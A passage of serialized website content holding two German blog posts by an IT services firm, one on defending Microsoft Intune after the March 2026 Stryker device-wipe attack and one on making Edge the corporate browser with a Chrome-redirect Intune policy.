hinüber.",[353,30397,30398],{},"Für die kritischsten Rollen – jene mit Control-Plane-Zugang, wie Global Administratoren – implementieren wir den „Clean Keyboard\"-Ansatz: eine physische Privileged Admin Workstation (PAW) mit dedizierter Hardware, gehärteten Richtlinien und keinerlei Berührungspunkten mit dem alltäglichen Arbeitskontext. Für administrative Rollen unterhalb der Control Plane bieten wir skalierbare Virtual Access Workstations (VAW) an, die auf einer gehärteten Azure Virtual Desktop-Infrastruktur innerhalb des Red Tenants aufgebaut sind. Der Zugriffspfad selbst ist durch Microsoft Entra Private Access geschützt, mit Zero Trust Network Access und Conditional Access-Richtlinien, bevor eine Sitzung hergestellt werden kann.",[353,30400,30401],{},"Microsoft Entra Internet Access blockiert den öffentlichen Internetzugang aus administrativen Sitzungen und beschränkt die Verbindungen strikt auf privilegierte Schnittstellen und autorisierte Tenant-Umgebungen. Nahezu Echtzeit-Sitzungswiderruf ist durch Universal Conditional Access Evaluation möglich, was bedeutet, dass ein widerrufenes Credential nicht als gültige Sitzung weiterbesteht.",[353,30403,30404,30405,30407],{},"Der Managed Red Tenant wird rund um die Uhr von unserem ",[374,30406,5638],{"href":8529}," überwacht, mit speziell entwickelten Erkennungen, die gezielt auf administrative Berechtigungen und Zugriffsmuster ausgerichtet sind. Ein Angreifer, der irgendwie ein Credential in dieser Umgebung kompromittiert, hätte nicht drei unentdeckte Stunden, um Wipe-Befehle über eine globale Geräteflotte auszuführen.",[353,30409,30410],{},"Das ist besonders relevant für Rollen wie Intune-Administratoren. Sie wissen, wie man Clients sichert, aber die Absicherung einer privilegierten Admin-Workstation erfordert andere Fähigkeiten: Enterprise Access Architecture, Identity Hardening, Zero Trust Controls. Diese liegen typischerweise beim Sicherheitsteam. Ein Managed Red Tenant nimmt diese Last vollständig ab: Intune-Admins erhalten eine professionell verwaltete, konsistent gehärtete Workstation, ohne selbst zu Experten für Sicherheits-Workstations werden zu müssen. Das gilt für jede hochprivilegierte Rolle in der Organisation.",[29656,30412],{"thumb":30413,"alt":30414,"id":30415,":full-width":7391},"/thumbs/thumb-managed-red-tenant.jpg","Jan Geisbauer und Thomas Naunheim diskutieren die Managed Red Tenant-Cybersicherheitsstrategie","rOEIvItNkjE",[2559,30417,30418,30419],{"style":29663},"Mehr auf unserem ",[374,30420,30423],{"href":30421,"target":5319,"rel":30422},"https://www.youtube.com/playlist?list=PLPxBXiOFJRHelegu_B-uZAyz2UrOSxioL",[5321],"YouTube-Kanal",[629,30425,30427],{"id":30426},"managed-intune-die-management-ebene-selbst-absichern","Managed Intune: die Management-Ebene selbst absichern",[353,30429,10713],{},[353,30431,30432,30433,30437],{},"Die zweite Ebene ist sicherzustellen, dass Intune – das Tool, das beim Stryker-Angriff als Waffe eingesetzt wurde – nach höchstem Sicherheitsstandard konfiguriert, betrieben und kontinuierlich gepflegt wird. Dafür ist unser ",[374,30434,30436],{"href":30435},"/de/entra-intune/managed-intune","Managed Intune","-Service zuständig.",[353,30439,30440],{},"Eine der zentralen Erkenntnisse aus Vorfällen wie diesem ist, dass Organisationen häufig Intune-Umgebungen erben, die organisch gewachsen sind: Richtlinien auf Richtlinien gestapelt, manuelle Änderungen über das Portal, die schwer zu prüfen sind, und Sicherheits-Baselines, die mit Microsofts eigenen, sich weiterentwickelnden Empfehlungen nicht Schritt gehalten haben. Genau diese Art von Umgebung ist es, in der Konfigurationsdrift ausnutzbare Lücken schafft.",[353,30442,30443,30444,30449],{},"Microsoft hat kürzlich ",[374,30445,30448],{"href":30446,"rel":30447},"https://techcommunity.microsoft.com/blog/intunecustomersuccess/best-practices-for-securing-microsoft-intune/4502117",[378],"Best Practices für die Absicherung von Microsoft Intune"," veröffentlicht – ein Signal, dass auch Microsoft Intune-Härtung als Thema betrachtet, das branchenweit explizite Aufmerksamkeit erfordert. Unser Managed Intune-Service basiert auf diesen Prinzipien, und wir haben Microsofts Empfehlungen als Teil unserer Baseline implementiert.",[353,30451,30452],{},"Unser Managed Intune-Service basiert auf der glueckkanja Intune Foundation: ein bewährter, kontinuierlich gepflegter Satz von Best Practices für das Gerätemanagement, vollständig als Code mit Terraform und unserem eigenen TerraProvider bereitgestellt. Jede Änderung ist automatisiert, versionskontrolliert und prüfbar. Es gibt keine undokumentierten Click-through-Konfigurationen, die ein Angreifer ausnutzen könnte, indem er die Lücke zwischen dem Beabsichtigten und dem tatsächlich Gesetzten versteht.",[353,30454,30455],{},"Aus Sicherheitsperspektive bedeutet das, dass Zero Trust, App Protection Policies und Endpoint Security-Konfigurationen by Design konsistent angewendet werden – über Windows, macOS, iOS und Android – nicht als einmalige Bereitstellungen, sondern als kontinuierlich durchgesetzte, fortlaufend aktualisierte Baselines, die Microsofts eigene Sicherheitsleitlinien nachverfolgen.",[353,30457,30458],{},"Entscheidend ist, dass Managed Intune die betriebliche Reife widerspiegelt, die modernes Endpoint-Management erfordert: kontinuierliches Compliance-Monitoring, strukturierte Änderungsgovernance und regelmäßige Service-Reviews – nicht als optionale Extras, sondern als Baseline-Operationen. Aber die Intune-Konfiguration zu sichern ist nur die halbe Miete. Wenn der Administrator, der auf die Konsole zugreift, dies von einem ungeschützten Gerät aus tut, bleibt die Management-Ebene trotzdem exponiert – genau hier vervollständigt der Managed Red Tenant das Modell.",[353,30460,30461],{},"Da alle Konfigurationen als Code auf Basis der Intune Foundation bereitgestellt werden, setzen wir ein striktes Vier-Augen-Prinzip mit Peer Review, zusätzlicher automatisierter Validierung und kontrollierten Deployment-Pipelines durch. Das eliminiert nicht verwaltete Portal-Änderungen innerhalb der Intune Foundation und stellt eine konsistente, prüfbare und sichere Baseline über alle Geräte hinweg sicher.",[353,30463,30464],{},"Der administrative Zugang wird durch ein Least-Privilege-Modell mit GDAP und Azure Lighthouse gesteuert, mit klar definierten Verantwortlichkeiten und eng begrenztem Zugang zum Kunden-Tenant. Das reduziert die mit privilegierten Operationen verbundene Angriffsfläche erheblich.",[353,30466,30467],{},"Aktionen auf Geräteebene, einschließlich destruktiver Operationen, verbleiben in der Verantwortung des Kunden, da ihre Ausführung eng mit organisationsspezifischen Prozessen und internen Governance-Frameworks verbunden ist. Microsoft und CISA empfehlen, solche Aktionen durch zusätzliche Schutzmaßnahmen zu sichern, beispielsweise durch Multi-Admin-Genehmigungskontrollen in Intune.",[2548,30469,30471],{"id":30470},"die-unbequeme-frage","Die unbequeme Frage",[353,30473,9352],{},[353,30475,30476],{},"Der Stryker-Angriff ist keine Anklage gegen Microsoft Intune. Intune hat sich genau so verhalten, wie es konzipiert wurde. Es führte die Befehle aus, die es von einem authentifizierten Administrator erhielt. Das Versagen lag nicht im Tool. Es lag im Fehlen von Kontrollen darüber, wer dieses Tool erreichen konnte, aus welchem Kontext heraus und mit welchem Autorisierungsgrad.",[353,30478,30479],{},"Das ist ein Governance- und Architekturproblem. Und es ist dasselbe Problem, das in den meisten Organisationen besteht, die heute Microsoft 365 betreiben.",[353,30481,30482],{},"Wenn Ihre Administratoren auf Intune, Entra ID oder Azure von denselben Geräten und Identitäten zugreifen, die sie für die alltägliche Arbeit verwenden – und wenn Ihre Intune-Umgebung über Jahre manueller Portal-Änderungen gewachsen ist anstatt durch ein strukturiertes, automatisiertes Betriebsmodell – tragen Sie dasselbe strukturelle Risiko, das Stryker am 11. März trug. Die Frage ist, ob ein Angreifer diese Schwachstelle finden wird, bevor Sie sie schließen.",[353,30484,30485,30487,30488,30490],{},[374,30486,11453],{"href":11452}," adressiert die Privilege- und Identitätsebene. ",[374,30489,30436],{"href":30435}," adressiert die Konfigurations- und Betriebsebene. Zusammen schließen sie die zwei Lücken, die den Stryker-Angriff möglich gemacht haben.",[353,30492,30493],{},"Wenn Sie verstehen möchten, wie einer der Services auf Ihre aktuelle Umgebung zutrifft oder wo Ihre konkreten Schwachstellen liegen, sprechen wir gerne darüber.",[353,30495,30496],{},"Wir werden in Kürze auch einen Deep-Dive-Artikel veröffentlichen, der untersucht, wie der Stryker-Vorfall überhaupt möglich sein konnte.",[2548,30498,1452],{"id":30499},"weitere-informationen",[353,30501,9352],{},[367,30503,30504,30511,30517,30524],{},[370,30505,30506],{},[374,30507,30510],{"href":30508,"rel":30509},"https://www.cisa.gov/secure-cloud-business-applications",[378],"CISA: Securing Cloud Business Applications",[370,30512,30513],{},[374,30514,30516],{"href":30446,"rel":30515},[378],"Microsoft: Best Practices für die Absicherung von Microsoft Intune",[370,30518,30519],{},[374,30520,30523],{"href":30521,"rel":30522},"https://techcrunch.com/2026/03/19/cisa-urges-companies-to-secure-microsoft-intune-systems-after-hackers-mass-wipe-stryker-devices/?utm_campaign=social",[378],"TechCrunch: CISA fordert Unternehmen auf, Microsoft Intune-Systeme zu sichern, nachdem Hacker Stryker-Geräte massenhaft gelöscht haben",[370,30525,30526],{},[374,30527,30530],{"href":30528,"rel":30529},"https://marketplace.microsoft.com/de-de/product/saas/glueckkanja-gabag.redtenant?tab=overview",[378],"Managed Red Tenant im Azure Marketplace",{"title":402,"searchDepth":403,"depth":403,"links":30532},[30533,30534,30535,30536,30537,30541,30542],{"id":30311,"depth":403,"text":30312},{"id":30323,"depth":403,"text":30324},{"id":30341,"depth":403,"text":30342},{"id":30353,"depth":403,"text":30354},{"id":30368,"depth":403,"text":30369,"children":30538},[30539,30540],{"id":30383,"depth":704,"text":30384},{"id":30426,"depth":704,"text":30427},{"id":30470,"depth":403,"text":30471},{"id":30499,"depth":403,"text":1452},{"lang":2183,"seoTitle":30544,"titleClass":7896,"date":30545,"categories":30546,"blogtitlepic":30547,"socialimg":30548,"customExcerpt":30549,"keywords":30550,"hreflang":30551,"asideNav":30558,"contactInContent":30573,"maxContent":406,"published":415},"Der Stryker-Angriff: Wie ein kompromittiertes Admin-Konto 80.000 Geräte über Intune löschte","2026-03-20",[1117],"head-stryker.jpg","/blog/heads/head-stryker.jpg","Am 11. März 2026 löschte Handala Geräte in 79 Ländern, und alles, was dafür nötig war, war ein kompromittiertes Intune-Admin-Konto. Keine Malware, kein Exploit, nur legitime Management-Tools, gegen ihre Besitzer gerichtet. Was passiert ist, warum es funktioniert hat und welche zwei architektonischen Lücken geschlossen werden müssen.","Stryker-Angriff, Handala, Microsoft Intune Wipe, Privileged Access Management, Admin-Workstation, Managed Red Tenant, Managed Intune, Zero Trust, Privileged Admin Workstation, PAW, Enterprise Access Model, CISA, Endpoint-Management-Sicherheit",[30552,30554,30556],{"lang":2183,"href":30553},"/de/posts/2026-03-20-stryker-attack-intune-privilege",{"lang":9114,"href":30555},"/es/posts/2026-03-20-stryker-attack-intune-privilege",{"lang":2118,"href":30557},"/en/posts/2026-03-20-stryker-attack-intune-privilege",{"menuItems":30559},[30560,30562,30564,30566,30569,30571],{"href":30561,"text":30312},"#was-wirklich-passiert-ist",{"href":30563,"text":30324},"#warum-dieser-angriff-erfolgreich-war",{"href":30565,"text":30342},"#cisa-hat-genug-gesehen",{"href":30567,"text":30568},"#trennung-ist-kein-luxus-sie-ist-die-kontrolle","Trennung ist kein Luxus",{"href":30570,"text":30369},"#zwei-verteidigungsebenen",{"href":30572,"text":30471},"#die-unbequeme-frage",{"quote":415,"infos":30574},{"bgColor":12128,"headline":30575,"subline":30576,"level":2548,"textStyling":9489,"flush":9490,"person":30577,"form":30579},"Kontakt aufnehmen","Möchten Sie wissen, wie Managed Red Tenant und Managed Intune die Lücken schließen, die der Stryker-Angriff ausgenutzt hat? Füllen Sie das Formular aus und wir erläutern Ihnen, wie es auf Ihre Umgebung zutrifft.",{"image":9327,"cloudinary":415,"alt":27782,"name":164,"quotee":164,"quoteeTitle":27783,"quote":30578},"Das Tool hat genau das getan, was man ihm gesagt hat. Das Problem war, dass niemand hätte in der Lage sein sollen, ihm das zu sagen – nicht von einem kompromittierten Alltags-Konto aus, nicht ohne eine zweite Genehmigung, nicht ohne eine isolierte administrative Umgebung. Das ist die Lücke, bei deren Schließung wir Organisationen helfen.",{"ctaText":9508,"cta":30580,"method":407,"action":9511,"fields":30581},{"skin":9510},[30582,30583,30584,30585,30588,30590,30591,30592,30594,30595,30596],{"label":9514,"type":3722,"id":9515,"required":415,"requiredMsg":10937},{"label":9518,"type":3722,"id":9519,"required":415,"requiredMsg":10939},{"label":10941,"type":9523,"id":9523,"required":415,"requiredMsg":9524},{"label":30586,"type":13030,"id":13031,"required":406,"requiredMsg":30587},"Ihre Nachricht an uns","Bitte geben Sie eine Nachricht ein.",{"label":30589,"type":9527,"id":9528,"required":415,"requiredMsg":9529},"Ihre Daten werden gespeichert und zur Beantwortung Ihrer Anfrage verwendet. Weitere Informationen finden Sie in unserer \u003Ca href=\"/de/privacy\">Datenschutzerklärung\u003C/a>.",{"type":9531,"id":13036,"value":1117},{"type":9531,"id":13038,"value":27799},{"type":9531,"id":9532,"value":30593},"Form: Blog Stryker Attack Intune Privilege | DE",{"type":9531,"id":9535,"value":10153},{"type":9531,"id":9538},{"type":9531,"id":27805},"/posts/2026-03-20-stryker-attack-intune-privilege",{"title":30299,"description":30305},"posts/2026-03-20-stryker-attack-intune-privilege",[4471,30601,10618],"Privileged Access","b-tI6kJb2L8y1ut7ykBwB_i4wwK8AwhLcCqpYdCcDXc",{"id":30604,"title":30605,"author":30606,"body":30607,"cta":3,"description":30611,"eventid":3,"extension":405,"hideInRecent":406,"layout":407,"meta":30799,"moment":30801,"navigation":415,"path":30827,"seo":30828,"stem":30829,"tags":3,"webcast":406,"__hash__":30830},"content_de/posts/2026-03-21-microsoft-edge-corporate-browser.md","Warum Edge euer einziger Corporate Browser sein sollte",[60],{"type":350,"value":30608,"toc":30791},[30609,30612,30616,30618,30624,30628,30630,30633,30637,30639,30642,30656,30660,30662,30668,30674,30677,30720,30728,30732,30734,30742,30753,30757,30759,30762,30788],[353,30610,30611],{},"Die Wahl des Browsers ist in Unternehmensumgebungen eine strategische Entscheidung: Sie beeinflusst direkt, wie viel Sicherheit und Verwaltungsaufwand ihr tatsächlich habt. Google Chrome war lange die naheliegende Option, aber Microsoft Edge hat sich zu einem Browser entwickelt, der direkt in den bestehenden Stack greift, vor allem wenn Microsoft 365 im Einsatz ist und die Verwaltung über Intune läuft.",[2548,30613,30615],{"id":30614},"sicherheit","Sicherheit",[353,30617,9352],{},[353,30619,30620,30621,30623],{},"Ein verwalteter Microsoft Edge Browser sorgt dafür, dass Schutzfunktionen konsistent auf allen Endgeräten greifen. Mit nativer Integration in Microsoft Defender SmartScreen schützt Edge vor Phishing, Malware und weiteren Bedrohungen. Über Intune lassen sich Richtlinien eng fassen: Verhalten steuern, riskante Erweiterungen blockieren, sicheres Browsen durchsetzen. glueckkanja's ",[374,30622,30436],{"href":30435}," liefert aktuelle Edge-Richtlinien, die an Microsofts Security-Baselines ausgerichtet sind.",[2548,30625,30627],{"id":30626},"synchronisation-mit-entra-id","Synchronisation mit Entra ID",[353,30629,9352],{},[353,30631,30632],{},"Edge synchronisiert Benutzerdaten wie Favoriten, Passwörter und Einstellungen sicher über Entra ID-Konten geräteübergreifend. Das ist besonders relevant in hybriden Arbeitsumgebungen, wo Mitarbeitende zwischen Unternehmensgeräten, virtuellen Desktops und mobilen Geräten wechseln, ohne dabei Kontext oder Produktivität zu verlieren.",[2548,30634,30636],{"id":30635},"komplexität-durch-mehrere-browser","Komplexität durch mehrere Browser",[353,30638,9352],{},[353,30640,30641],{},"Wer Google Chrome parallel zu Edge betreibt, schafft sich Mehrarbeit:",[367,30643,30644,30650],{"style":29644},[370,30645,30646,30649],{},[433,30647,30648],{},"Backup und Sync:"," Andere Browser erfordern häufig Drittanbieter-Konten, etwa ein Google-Konto, um die Synchronisierung zu ermöglichen.",[370,30651,30652,30655],{},[433,30653,30654],{},"Richtlinienpflege:"," Jeder Browser braucht ein eigenes Set an Sicherheits- und Konfigurationsrichtlinien. Das bindet Ressourcen, erhöht das Risiko von Fehlkonfigurationen und erschwert Audits.",[2548,30657,30659],{"id":30658},"chrome-umleitung-via-intune","Chrome-Umleitung via Intune",[353,30661,9352],{},[353,30663,30664,30665,30667],{},"Für die Umleitung von Chrome auf Edge gibt es eine fertige Richtlinie, die sich mit glueckkanja's ",[374,30666,30436],{"href":30435}," in wenigen Minuten einrichten lässt. Nutzer landen auf einer Seite, die Microsoft Edge als Standard-Corporate-Browser vorstellt, mit einem direkten Link zum Öffnen.",[353,30669,30670],{},[356,30671],{"alt":30672,"src":30673},"Microsoft Edge als Standard-Corporate-Browser","https://res.cloudinary.com/c4a8/image/upload/blog/pics/microsoft-edge-default-browser.png",[353,30675,30676],{},"Die Konfigurationsrichtlinie regelt, wie Chrome eingeschränkt und umgeleitet wird:",[367,30678,30679,30692,30702,30708,30714],{"style":29644},[370,30680,30681,30684,30685,30688,30689,456],{},[433,30682,30683],{},"URL-Zulassungsliste:"," Nur bestimmte URLs sind erlaubt, etwa die Landingpage ",[3724,30686,30687],{},"https://edge.glueckkanja.com/"," und der Moniker ",[3724,30690,30691],{},"microsoft-edge:*",[370,30693,30694,30697,30698,30701],{},[433,30695,30696],{},"URL-Sperrliste:"," Alle anderen URLs werden blockiert (",[3724,30699,30700],{},"*","), was das allgemeine Browsen in Chrome effektiv unterbindet.",[370,30703,30704,30707],{},[433,30705,30706],{},"Startseite und neuer Tab:"," Beide zeigen auf die Landingpage, die zur Nutzung von Edge auffordert.",[370,30709,30710,30713],{},[433,30711,30712],{},"Protokollverarbeitung:"," Chrome öffnet beim Klick auf URLs der Landingpage automatisch Edge.",[370,30715,30716,30719],{},[433,30717,30718],{},"Erweiterungskontrolle:"," Zusätzliche Einstellungen unterbinden die Installation von Erweiterungen.",[353,30721,30722,30723],{},"Beispielrichtlinie als Download: ",[374,30724,30727],{"href":30725,"rel":30726},"https://github.com/glueckkanja/edge-redirection-landingpage/tree/main/docs/policies",[378],"Win - Default - Google Chrome - Redirect to Edge - v2.0.json",[2548,30729,30731],{"id":30730},"landingpage-via-github-pages","Landingpage via GitHub Pages",[353,30733,9352],{},[353,30735,30736,30737],{},"Die Seite läuft über GitHub Pages. Wer sie anpassen will, kann das direkt im Projekt tun: ",[374,30738,30741],{"href":30739,"rel":30740},"https://github.com/glueckkanja/edge-redirection-landingpage",[378],"edge-redirection-landingpage",[353,30743,30744],{},[374,30745,30750],{"role":7994,"className":30746,"dataText":30747,"href":30748,"target":5319,"rel":30749,"type":8004},[7996,7997,8000,8001],"Landingpage in Aktion","https://edge.glueckkanja.com",[5321],[7258,30751,30747],{"className":30752},[8008],[2548,30754,30756],{"id":30755},"im-überblick","Im Überblick",[353,30758,9352],{},[353,30760,30761],{},"Microsoft Edge bietet eine sichere, verwaltbare Browsing-Umgebung mit tiefer Integration in Microsoft 365 und ist damit die logische Wahl als Standard-Corporate-Browser. Die wichtigsten Vorteile im Überblick:",[367,30763,30764,30767,30770,30773,30776,30779,30782,30785],{"style":29644},[370,30765,30766],{},"Entra ID-Integration mit SSO",[370,30768,30769],{},"Cloud-basierte Synchronisierung und Backup über Microsoft 365 auf mehreren Plattformen",[370,30771,30772],{},"Integriertes Sicherheits-Ökosystem mit Microsoft Defender SmartScreen und Microsoft Endpoint DLP",[370,30774,30775],{},"Unterstützung von Intune App Protection Policies",[370,30777,30778],{},"Browser-Management über Microsoft 365 Admin Center und Intune",[370,30780,30781],{},"Internet Explorer-Modus für Legacy-Anwendungen",[370,30783,30784],{},"Corporate Branding",[370,30786,30787],{},"Copilot-Integration",[353,30789,30790],{},"Wer auf Edge standardisiert, reduziert Komplexität, stärkt die Sicherheit und vereinfacht den Support. Den Umleitungsansatz auf weitere Browser auszuweiten liegt von hier aus nah.",{"title":402,"searchDepth":403,"depth":403,"links":30792},[30793,30794,30795,30796,30797,30798],{"id":30614,"depth":403,"text":30615},{"id":30626,"depth":403,"text":30627},{"id":30635,"depth":403,"text":30636},{"id":30658,"depth":403,"text":30659},{"id":30730,"depth":403,"text":30731},{"id":30755,"depth":403,"text":30756},{"lang":2183,"seoTitle":30800,"titleClass":7896,"date":30801,"blogtitlepic":30802,"socialimg":30803,"customExcerpt":30804,"keywords":30805,"hreflang":30806,"published":415,"asideNav":30813},"Microsoft Edge als gesicherter Corporate Browser: Sicherheit, Sync und Chrome-Umleitung via Intune","2026-03-21","head-microsoft-edge-default-browser.jpg","/blog/heads/head-microsoft-edge-default-browser.jpg","Kein Unternehmen hat Chrome wirklich gewählt; er war einfach da, mit eigener Sync-Logik, eigener Kontoverwaltung, eigener Richtlinienoberfläche. Microsoft Edge dagegen greift direkt in die Infrastruktur, die ohnehin schon läuft: Entra ID, Intune, Defender. Dieser Beitrag zeigt, wie der Wechsel aussieht, wie Chrome per Intune-Richtlinie auf eine Landingpage umgeleitet wird und was wegfällt, wenn man aufhört, zwei Browser parallel zu betreiben.","Microsoft Edge, Corporate Browser, Microsoft Intune, Entra ID, Chrome-Umleitung, Managed Intune, Browser-Richtlinie, Microsoft Defender SmartScreen, Enterprise Browser, Browser-Management, URL-Sperrliste, URL-Zulassungsliste",[30807,30809,30811],{"lang":2183,"href":30808},"/de/posts/2026-03-21-microsoft-edge-corporate-browser",{"lang":2118,"href":30810},"/en/posts/2026-03-21-microsoft-edge-corporate-browser",{"lang":9114,"href":30812},"/es/posts/2026-03-21-microsoft-edge-corporate-browser",{"menuItems":30814},[30815,30817,30819,30821,30823,30825],{"href":30816,"text":30615},"#sicherheit",{"href":30818,"text":30627},"#synchronisation-mit-entra-id",{"href":30820,"text":30636},"#komplexität-durch-mehrere-browser",{"href":30822,"text":30659},"#chrome-umleitung-via-intune",{"href":30824,"text":30731},"#landingpage-via-github-pages",{"href":30826,"text":30756},"#im-überblick","/posts/2026-03-21-microsoft-edge-corporate-browser",{"title":30605,"description":30611},"posts/2026-03-21-microsoft-edge-corporate-browser","nk6RYmsy9aHIPrWtuCZFxqzG4PVOnBoAgI-NYSTo3pM",1775829115881]